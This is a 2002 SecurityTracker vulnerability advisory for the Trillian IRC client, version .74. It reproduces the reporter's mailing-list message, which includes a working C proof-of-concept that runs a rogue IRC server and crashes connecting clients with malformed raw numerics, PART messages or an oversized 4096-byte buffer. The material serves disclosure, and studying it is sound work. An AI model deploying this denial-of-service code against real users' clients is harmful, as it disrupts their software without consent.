Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Trillian IRC Chat Client Has More Bugs That Let Remote Servers Crash the Client
|
|
SecurityTracker Alert ID: 1005291 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Sep 26 2002
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Version(s): .74
|
Description: Some additional denial of service vulnerabilities were reported in the Trillian Internet Relay Chat (IRC) client. A remote user can cause the client to crash.
It is reported that a remote user can send various IRC Raw Messages to cause Trillian to crash. The following Raw Messages can trigger
the flaw:
206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333, 352, 367
The messages are sent in the format: ':Server
<Num>', where <Num> is one of the raw codes listed above.
Also, if Trillian receives a message regarding a user parting a channel
that Trillian is not in (or if no channel is specified), Trillian will reportedly crash. These messages are apparently sent in
the form: ":nick!ident@address PART <Channel>"
It is also reported that a remote user (an IRC server) can send a block of data
longer greater than 4095 bytes to cause Trillian to crash.
Some demonstration exploit code is provided in the Source Message.
|
Impact: A remote user (IRC server) can cause the Trillian client to crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.ceruleanstudios.com/ (Links to External Site)
|
Cause: Boundary error, Exception handling error
|
Underlying OS: Windows (Any)
|
Reported By: "Lance Fitz-Herbert" <fitzies@hotmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 22 Sep 2002 14:11:07 +0000
From: "Lance Fitz-Herbert" <fitzies@hotmail.com>
Subject: *sigh* Trillian multiple DoS's flaws.
|
I'm beginning to wonder if the makers of the instant messaging client
Trillian, have done any bounds checking in their code. Personally I like
trillian, its a nice peice of software, on the outside.
Here's three more DoS attacks on trillian, exploitable via a server.
I've included some code which exploits all three.
These were tested on version .74, probably older versions are affected tho.
Multiple Raw flaws:
-------------------
There seems to be a flaw in the way trillian proccesses some IRC Raw
Messages, the following raw's crash Trillian:
206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333, 352, 367
The server sends the raws in the format: ':Server <Num>'
<Num> being the one of the raw codes listed above.
Part flaw:
----------
If trillian receives a message about a user parting a channel it itself is
not in, or if no channel is specified at all, trillian will crash.
Part Messages are sent in the form: ":nick!ident@address PART <Channel>"
Data buffering flaw:
--------------------
There appears to be a flaw in the way trillian buffers data from the IRC
server. If trillian receives a block of data over 4095 bytes, trillian will
crash.
Exploit code to reproduce flaws:
--------------------------------
/* Trillian-Dos.c
Author: Lance Fitz-Herbert
Contact: IRC: Phrizer, DALnet - #KORP
ICQ: 23549284
Exploits Multiple Trillian DoS Flaws:
Raws 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333,
352, 367
Part Flaw
Data length flaw.
Tested On Version .74
Compiles with Borland 5.5 Commandline Tools.
These Examples Will Just DoS The Trillian Client,
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>
SOCKET s;
#define SERVER ":server "
#define PART ":nick!ident@address PART\n"
int main(int argc, char *argv[]) {
SOCKET TempSock = SOCKET_ERROR;
WSADATA WsaDat;
SOCKADDR_IN Sockaddr;
int nRet;
char payload[4096];
if (argc < 2) {
usage();
return 1;
}
if ((!strcmp(argv[1],"raw")) && (argc < 3) || (strcmp(argv[1],"raw"))
&&
(strcmp(argv[1],"part")) && (strcmp(argv[1],"data"))) {
usage();
return 1;
}
printf("Listening on port 6667 for connections....\n");
if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
printf("ERROR: WSA Initialization failed.");
return 0;
}
/* Create Socket */
s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s == INVALID_SOCKET) {
printf("ERROR: Could Not Create Socket. Exiting\n");
WSACleanup();
return 0;
}
Sockaddr.sin_port = htons(6667);
Sockaddr.sin_family = AF_INET;
Sockaddr.sin_addr.s_addr = INADDR_ANY;
nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
if (nRet == SOCKET_ERROR) {
printf("ERROR Binding Socket");
WSACleanup();
return 0;
}
/* Make Socket Listen */
if (listen(s, 10) == SOCKET_ERROR) {
printf("ERROR: Couldnt Make Listening Socket\n");
WSACleanup();
return 0;
}
while (TempSock == SOCKET_ERROR) {
TempSock = accept(s, NULL, NULL);
}
printf("Client Connected, Sending Payload\n");
if (!strcmp(argv[1],"part")) {
send(TempSock,PART,strlen(PART),0);
}
if (!strcmp(argv[1],"raw")) {
send(TempSock,SERVER,strlen(SERVER),0);
send(TempSock,argv[2],strlen(argv[2]),0);
send(TempSock,"\n",1,0);
}
if (!strcmp(argv[1],"data")) {
memset(payload,'A',4096);
send(TempSock,payload,strlen(payload),0);
}
printf("Exiting\n");
sleep(100);
WSACleanup();
return 0;
usage() {
printf("\nTrillian Multiple DoS Flaws\n");
printf("---------------------------\n");
printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
printf("Tested On Version .74\n\n");
printf("Usage: Trillian-Dos <type> [num]\n");
printf("Type: raw, part, data\n");
printf("Num : 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332,
333, 352, 367\n\n");
--end code--
----
NOTE: Because of the amount of spam i receive, i require all emails directed
*to me* to contain the word "nospam" in the subject line somewhere. Else i
might not get your email. thankyou.
----
_________________________________________________________________
MSN Photos is the easiest way to share and print your photos:
http://photos.msn.com/support/worldwide.aspx
|
|
Go to the Top of This SecurityTracker Archive Page
|
